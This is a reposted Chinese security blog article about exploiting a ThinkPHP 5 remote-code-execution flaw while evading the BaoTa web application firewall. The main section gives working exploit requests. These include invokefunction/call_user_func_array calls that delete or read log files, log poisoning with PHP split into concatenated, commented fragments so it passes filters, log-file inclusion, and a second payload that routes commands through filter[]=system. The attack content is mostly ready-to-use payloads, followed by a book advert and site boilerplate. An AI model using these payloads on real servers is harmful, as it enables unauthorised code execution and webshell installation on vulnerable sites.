过WAF(宝塔)的小思路

admin 2022年2月10日00:58:40安全文章评论101 views1738字阅读5分47秒阅读模式

前言

在一个项目上发现了一个tp5的rce漏洞,但是有宝塔拦截了
通常宝塔拦截了后,一些system、assert等危险函数是不能用了,但可以使用tp5的函数进行文件包含
但是我遇到这个宝塔应该不是默认规则,一些whoami、id、ipconfig、<?php a、等也会拦截,挺难绕过的,只好从文件包含日志下手了,这里直接将一句话木马写入日志是会被拦截的,所以只能另找方法。

RCE绕宝塔

POC1

文件包含日志通常是构造语句写入日志,然后包含日志文件
/index.php?s=index&content=<?php phpinfo();?>/index.php?s=index/thinkLang/load&file=../runtime/log/202201/21.log
但是很多时候我们构造语句时导致日志坏了,就不能包含了
过WAF(宝塔)的小思路
需要将日志删除,然后重新构造
/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=unlink&vars[1][]=../runtime/log/202201/21.log
有时候宝塔规则太狠了,发现<?php ?>或其它就给拦截,我们可以通过拆分进行构造语句
首先正常访问
http://192.168.172.129:8808/index.php?s=index&content=test11
然后观察最新一条日志记录了什么
/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=../runtime/log/202201/21.log

过WAF(宝塔)的小思路
这里还要注意编码情况,这里可以看到这几处将我们请求写入了日志,并且没有编码
过WAF(宝塔)的小思路
然后构造一句话,就已简单的<?php system(id);?>为例子
通过拆分和注释相互配合
<?php /*............*/$a="sys"."tem";/*..........*/$b="id";/*.........*/$a($b);/*
将上面四句话分别插入对应位置
过WAF(宝塔)的小思路
成功插入日志中
过WAF(宝塔)的小思路
最后包含日志
/index.php?s=index/thinkLang/load&file=../runtime/log/202201/21.log
过WAF(宝塔)的小思路
然后配合该技巧,构造一个能绕过宝塔的一句话木马即可。

poc2

也就是另一种rce语句,根据poc1的思路,相同方式写入日志,错误就删日志
get[]=id&_method=__construct&method=get&filter[]=system
get[]=..runtimelog20220114.log&_method=__construct&method=get&filter[]=unlink
get[]=..runtimelog20220114.log&_method=__construct&method=get&filter[]=think__include_file

转载奇安信攻防社区:https://forum.butian.net/share/1121

好书推荐

过WAF(宝塔)的小思路

AST是目前爬虫领域的热点。本书从AST这一个知识点出发,由浅入深,带领读者掌握反爬虫AST的原理,并帮助读者培养解决实际问题的能力。

本书共11章,分为四部分。第一部分(第1~4章)介绍开发环境的搭建方法、Web调试的必备技巧以及爬虫与反爬虫的基本知识;第二部分(第5~6章)讲解混淆JavaScript代码的手工逆向方法与JavaScript代码安全防护的原理;第三部分(第7~8章)讲解AST的原理与API的使用方法;第四部分(第9~11章)以AST为基础,讲解自动化的JavaScript代码防护与还原方案,并带领读者进行实战训练。

本书适合作为计算机培训的教材,也可供安全开发人员、爬虫初学者以及想要在爬虫领域进阶的人员学习。

禁止非法,后果自负

欢迎关注公众号:web安全工具库

欢迎关注视频号:之乎者也吧

过WAF(宝塔)的小思路


过WAF(宝塔)的小思路


过WAF(宝塔)的小思路

原文始发于微信公众号(web安全工具库):过WAF(宝塔)的小思路

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年2月10日00:58:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  过WAF(宝塔)的小思路 https://cn-sec.com/archives/771456.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: